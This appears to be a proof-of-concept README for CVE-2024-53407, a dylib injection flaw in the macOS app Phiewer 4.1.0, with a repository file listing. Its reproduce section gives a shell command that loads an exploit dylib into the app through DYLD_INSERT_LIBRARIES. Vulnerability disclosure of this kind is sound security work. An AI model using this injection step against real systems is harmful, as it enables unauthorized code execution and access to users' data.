CVE-2024-53407# CVE-2024-53407
In Phiewer 4.1.0, a dylib injection leads to Command Execution whichallow attackers to inject dylib file potentially leading to remote control and unauthorized access to sensitive user data in MacOs.
# Reproduce
use the .dylib file to inject a command
```shell
DYLD_INSERT_LIBRARIES=exploit_combined.dylib /Applications/Phiewer\ \(lite\).app/Contents/MacOS/Phiewer\ \(lite\)
```
# Impact
Command Execution (Local)
# References
https://phiewer.com/
https://www.cve.org/CVERecord?id=CVE-2024-53407
[4.0K] /data/pocs/f07ff5b9ae0cc13f55feae618f3f3b9cf7543355
├── [ 81K] exploit_combined.dylib
├── [ 291] main8.m
└── [ 517] README.md
0 directories, 3 files